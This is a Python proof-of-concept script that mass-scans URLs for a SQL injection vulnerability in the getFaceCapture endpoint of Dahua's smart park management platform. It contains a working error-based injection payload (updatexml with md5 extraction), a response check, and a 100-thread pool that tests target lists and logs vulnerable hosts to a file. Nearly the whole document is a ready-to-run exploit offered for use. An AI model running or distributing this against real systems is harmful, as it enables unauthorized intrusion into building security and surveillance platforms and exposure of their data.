import requests,sys,re,argparse,time
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    test="""
                       /$$     /$$$$$$$$                            /$$$$$$                        /$$                                  
                      | $$    | $$_____/                           /$$__  $$                      | $$                                  
  /$$$$$$   /$$$$$$  /$$$$$$  | $$    /$$$$$$   /$$$$$$$  /$$$$$$ | $$  \__/  /$$$$$$   /$$$$$$  /$$$$$$   /$$   /$$  /$$$$$$   /$$$$$$ 
 /$$__  $$ /$$__  $$|_  $$_/  | $$$$$|____  $$ /$$_____/ /$$__  $$| $$       |____  $$ /$$__  $$|_  $$_/  | $$  | $$ /$$__  $$ /$$__  $$
| $$  \ $$| $$$$$$$$  | $$    | $$__/ /$$$$$$$| $$      | $$$$$$$$| $$        /$$$$$$$| $$  \ $$  | $$    | $$  | $$| $$  \__/| $$$$$$$$
| $$  | $$| $$_____/  | $$ /$$| $$   /$$__  $$| $$      | $$_____/| $$    $$ /$$__  $$| $$  | $$  | $$ /$$| $$  | $$| $$      | $$_____/
|  $$$$$$$|  $$$$$$$  |  $$$$/| $$  |  $$$$$$$|  $$$$$$$|  $$$$$$$|  $$$$$$/|  $$$$$$$| $$$$$$$/  |  $$$$/|  $$$$$$/| $$      |  $$$$$$$
 \____  $$ \_______/   \___/  |__/   \_______/ \_______/ \_______/ \______/  \_______/| $$____/    \___/   \______/ |__/       \_______/
 /$$  \ $$                                                                            | $$                                              
|  $$$$$$/                                                                            | $$                                              
 \______/                                                                             |__/                                              
"""

    print(test)



def main():
    banner()
    parser=argparse.ArgumentParser(description='大华智慧园区综合管理平台getFaceCaptureSQL注入漏洞')
    parser.add_argument('-u','--url',dest='url',type=str,help='input the url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input the file')
    args=parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp=Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")



def poc(target):
    url_payload= '/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D'


    try:
        res1=requests.post(url=target+url_payload,timeout=10)
        if '202CB962AC59075B964B07152D234B70' in res1.text:
            print( f"[+]{target} 存在漏洞！")
            with open('result.txt','a',encoding='utf-8')as fp:
                fp.write(target+'\n')
                return True
        else:
            print('[-] 不存在漏洞')
            return False
    except:
        print('目标网站存在问题，无法访问')



if __name__ =='__main__':
    main()
